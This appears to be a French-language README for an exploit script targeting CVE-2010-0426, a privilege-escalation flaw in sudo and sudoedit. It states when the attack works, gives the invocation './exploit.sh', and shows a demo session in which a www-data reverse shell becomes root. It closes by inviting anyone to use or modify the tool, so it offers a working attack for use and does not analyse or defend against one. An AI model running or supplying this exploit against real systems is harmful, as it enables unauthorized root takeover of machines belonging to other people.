
sudo 1.6.x avant 1.6.9p21 et 1.7.x avant 1.7.2p4 - Élévation de privilèges avec sudo et sudoedit
https://www.cvedetails.com/cve/CVE-2010-0426/
sudo 1.6.x avant 1.6.9p21 et 1.7.x avant 1.7.2p4, lorsqu'une pseudo-commande est activée, permet une correspondance entre le nom de la pseudo-commande et le nom d'un fichier exécutable dans un répertoire arbitraire, ce qui permet aux utilisateurs locaux d'obtenir des privilèges via un fichier exécutable spécialement conçu, comme le démontre un fichier nommé sudoedit dans le répertoire personnel d'un utilisateur.
Élevez les privilèges lorsque le binaire sudoedit dispose de la permission suid et qu'un fichier peut être modifié via sudo (vérifiez avec sudo -l)
./exploit.sh
Passez à root depuis un revshell à faibles privilèges
www-data@g1vi:/var/tmp$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@g1vi:/var/tmp$ ./exploit.sh
[+] Target is vulnerable
[+] Running stuff...
root@g1vi:/var/tmp$ id
uid=0(root) gid=0(root) groups=0(root)
N'hésitez pas à l'utiliser ou à le modifier quand et où vous le souhaitez.